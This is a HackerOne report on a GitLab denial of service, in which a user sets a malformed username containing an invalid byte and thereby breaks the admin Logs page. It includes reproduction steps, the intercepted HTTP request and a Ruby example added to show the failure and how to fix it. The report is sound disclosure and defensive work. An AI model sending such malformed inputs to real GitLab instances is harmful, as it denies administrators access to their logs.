Denial of Service via "Change username".

HackerOne report #482529 by sql00 on 2019-01-19, assigned to jritchey:

An attacker (a normal registered user) can block access to the "/admin/logs" page in the Administration panel. As a result, the Administrator will not be able to open the "Logs" page.

Steps To Reproduce:

  1. Create a normal GitLab user via the "Register" page.
  2. Go to Settings -> Account -> Change Username
  3. Click "Update Username" and intercept the request.
    Request:
PUT /profile/update_username.json HTTP/1.1  
Host: 192.168.1.106  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-Token: fo/jJTRUcYjKV46y1/mYnJzCtTu5otud5El0Y9PW+Wzu7o5dLCtsJ5WMbYLN1DEzFRqxgR2z4H7f6I2r/sliew==  
X-Requested-With: XMLHttpRequest  
Content-Type: application/json;charset=utf-8  
Referer: http://192.168.1.106/profile/account  
Content-Length: 30  
Cookie: _gitlab_session=fa5bbd5f02462cde2814d93489660c3f; sidebar_collapsed=false  
Connection: close

{"user":{"username":"test"}}  
  4. Change the username from "test" to "t�est." and send the request. You will receive the response "Something went wrong (500)".
  5. Now log in to an Administrator account (e.g. root).
  6. Go to "http:///admin/logs"
  7. The response from the back-end will be
    "500 Whoops, something went wrong on our end."
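The following is an added example, not code from the report or from GitLab. It reproduces the failure mode the steps above describe under one assumption: that the 500 on /admin/logs comes from the log viewer reading a log line that contains the malformed username and is therefore no longer valid UTF-8. The sample log content, the two viewer functions and the username rule are all constructed for this example; GitLab's real username validation is not reproduced here.

```ruby
# Added example (not GitLab's code). ASSUMPTION: the admin log viewer fails
# because a log line containing the malformed username is not valid UTF-8.

# Constructed sample log: a normal request line, a parameters line carrying a
# username with an invalid byte (\xFF can never appear in valid UTF-8), and a
# completion line. Stored as raw bytes, as a log file read from disk would be.
SAMPLE_LOG = ("Started PUT \"/profile/update_username.json\" for 192.168.1.106\n" \
              "Parameters: {\"user\"=>{\"username\"=>\"t\xFFest.\"}}\n" \
              "Completed 500 Internal Server Error\n").b

# Naive viewer: tags the bytes as UTF-8 and runs regexps over them.
# Any regexp operation on a string with an invalid byte sequence raises
# ArgumentError ("invalid byte sequence in UTF-8"); unrescued in a Rails
# controller, that is exactly the 500 the report shows for /admin/logs.
def naive_render(raw)
  text = raw.dup.force_encoding(Encoding::UTF_8)
  text.split(/\n/).map { |line| line.gsub(/\s+/, " ") }
end

# Hardened viewer: String#scrub replaces every invalid byte sequence with
# U+FFFD before any regexp work, so a single bad log line cannot take the
# whole page down. Each line is still rendered and the bad one stays visible.
def safe_render(raw)
  text = raw.dup.force_encoding(Encoding::UTF_8).scrub("\uFFFD")
  text.split(/\n/).map { |line| line.gsub(/\s+/, " ") }
end

# Defence at the input side: reject the username before it is persisted or
# logged. The pattern below is an assumed rule for this example (ASCII
# letters, digits, '_', '.', '-', no leading/trailing '.' or '-'), not
# GitLab's own validation.
USERNAME_RE = /\A[a-zA-Z0-9_][a-zA-Z0-9_.-]*[a-zA-Z0-9_]\z/

def username_valid?(name)
  name.valid_encoding? && name.ascii_only? && USERNAME_RE.match?(name)
end

if __FILE__ == $PROGRAM_NAME
  begin
    naive_render(SAMPLE_LOG)
  rescue ArgumentError => e
    puts "naive viewer failed: #{e.message}"   # the 500 from the report
  end
  safe_render(SAMPLE_LOG).each { |line| puts "safe viewer: #{line}" }
  puts "username 'test' valid?      #{username_valid?('test')}"
  puts "username \"t\\xFFest.\" valid? #{username_valid?("t\xFFest.".b)}"
end
```

Running the file shows the naive viewer aborting on the parameters line while the hardened viewer prints all three lines with the bad byte rendered as U+FFFD; the validator rejects the malformed name so it never reaches the log in the first place.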

Impact

An attacker is able to block access to important Administrative Page.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • dos1.PNG
  • dos2.PNG